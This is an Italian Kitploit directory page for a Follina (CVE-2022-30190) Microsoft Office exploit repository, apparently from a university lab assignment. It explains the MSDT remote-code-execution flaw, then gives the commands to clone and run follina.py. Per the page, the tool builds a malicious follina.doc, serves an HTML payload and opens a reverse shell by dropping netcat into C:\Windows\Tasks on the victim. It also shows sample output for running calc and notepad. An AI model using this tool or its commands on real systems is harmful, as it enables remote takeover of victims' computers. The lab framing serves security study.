Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2022-30190 — Follina (CVE-2022-30190) è una vulnerabilità zero-day di Microsoft Office scoperta di recente. È una vulnerabilità ad alta gravità che gli hacker possono sfruttare per attacchi di esecuzione remota di codice (RCE). | Kitploit
Strumenti/GitHubGitHub/aminetitrofine/cve-2022-30190
Generazione di PayloadExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlRed TeamingStrumento di Accesso Remoto
GitHubaminetitrofine/cve-2022-30190

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2022-30190

Follina (CVE-2022-30190) è una vulnerabilità zero-day di Microsoft Office scoperta di recente. È una vulnerabilità ad alta gravità che gli hacker possono sfruttare per attacchi di esecuzione remota di codice (RCE).

Vedi Repository
1263 anni faNon ancora revisionato

CVE 30190

Amine TITROFINE | 17 dicembre 2022


Follina (CVE-2022-30190) è una vulnerabilità zero-day di Microsoft Office scoperta di recente. È una vulnerabilità ad alta gravità che gli hacker possono sfruttare per attacchi di esecuzione remota di codice (RCE). Si manifesta quando MSDT viene chiamato utilizzando il protocollo URL da un'applicazione chiamante come Word. Un attaccante che sfrutta con successo questa vulnerabilità può eseguire codice arbitrario con i privilegi dell'applicazione chiamante. L'attaccante può quindi installare programmi, visualizzare, modificare o eliminare dati, o creare nuovi account nel contesto consentito dai diritti dell'utente.

Ambiente

2 VM:

  • Macchina Attaccante
    • kali-linux-2022.3-virtualbox-amd64 ( Link per il download )
  • Macchina Vittima
    • Windows 10 (64 bit) ( Link per il download )
    • Microsoft Office 2016 Pro ( Link per il download )

Exploit

root@kitploit:~
$ git clone https://gitlab.com/grenoble-inp-ensimag/Secu3A/Devoir1/CVE_2022_30190_amine_titrofine_farah_ben_youssef_walid_lanjri.git

$ cd CVE_2022_30190_amine_titrofine_farah_ben_youssef_walid_lanjri

$ python3 follina.py –r 9999

Dopo aver eseguito il programma follina.py, apparirà un file ( follina.doc ) che contiene uno script malevolo.

Per facilitare la condivisione di file tra le due VM, useremo un server HTTP Python

root@kitploit:~
$ python3 –m http.server 8080

Esempi

Ottieni una reverse shell sulla porta 9999. Nota: questo scarica un binario netcat sulla vittima e lo inserisce in C:\Windows\Tasks. Non pulisce il binario. Questo attiverà le rilevazioni antivirus a meno che l'antivirus non sia disabilitato.

root@kitploit:~
$ python3 follina.py -r 9999

Esegui calc.exe:

root@kitploit:~
$ python3 follina.py -c "calc"
[+] copied staging doc /tmp/9mcvbrwo
[+] created maldoc ./follina.doc
[+] serving html payload on :8000

Esegui notepad.exe:

root@kitploit:~
$ python3 follina.py -c "notepad"
Scarica lo strumento